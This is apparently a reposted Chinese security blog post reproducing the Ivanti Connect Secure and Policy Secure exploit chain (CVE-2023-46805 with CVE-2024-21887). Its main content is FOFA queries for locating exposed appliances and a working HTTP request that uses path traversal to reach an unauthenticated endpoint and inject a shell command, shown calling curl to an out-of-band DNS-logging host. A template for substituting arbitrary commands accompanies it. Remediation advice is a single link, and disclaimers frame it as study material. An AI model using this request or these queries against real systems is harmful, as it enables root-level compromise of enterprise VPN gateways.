“人性的背后是白云苍狗,愿你我都是生活的高手。”
免责声明:文章中内容来源于互联网,涉及的所有内容仅供安全研究与教学之用,读者将其信息做其他用途而造成的任何直接或者间接的后果及损失由用户承担全部法律及连带责任。文章作者不承担任何法律及连带责任!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。
0x00.产品介绍
lvanti Connect Secure,原名Pulse Connect Secure,是一款企业级远程访问解决方案。这个产品主要提供安全远程访问(VPN),多因素认证等功能。
0x01.影响范围
Ivanti Connect Secure (9.x, 22.x)
Ivanti Policy Secure (9.x, 22.x)
0x02.漏洞概述
lvanti Connect Secure (9.x, 22.x)和vanti Policy Secure (9.x,22.x)的web组件中存在身份验证绕过漏洞(CVE-2023-46805)和命令注入漏洞(CVE-2024-21887),成功利用该漏洞链允许远程未经认证的攻击者以root权限执行任意操作系统命令,导致服务器失陷。
0x03.FOFA
body="welcome.cgi?p=logo"
或
title=="Ivanti Connect Secure"body="/dana-na/auth/url_default/welcome.cgi"
0x04.漏洞复现
此漏洞可执行任意系统命令,且影响范围较大,利用成本极低
%3b任意系统命令%3b
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20moweuq.dnslog.cn%3b HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
0x05.修复建议
厂商已发布该漏洞修复方案
https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
遵守网络安全法,请勿用于非法入侵,仅供学习
原文始发于微信公众号(深白网安):lvanti VPN RCE漏洞复现(CVE-2024-21887) 影响较为严重!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论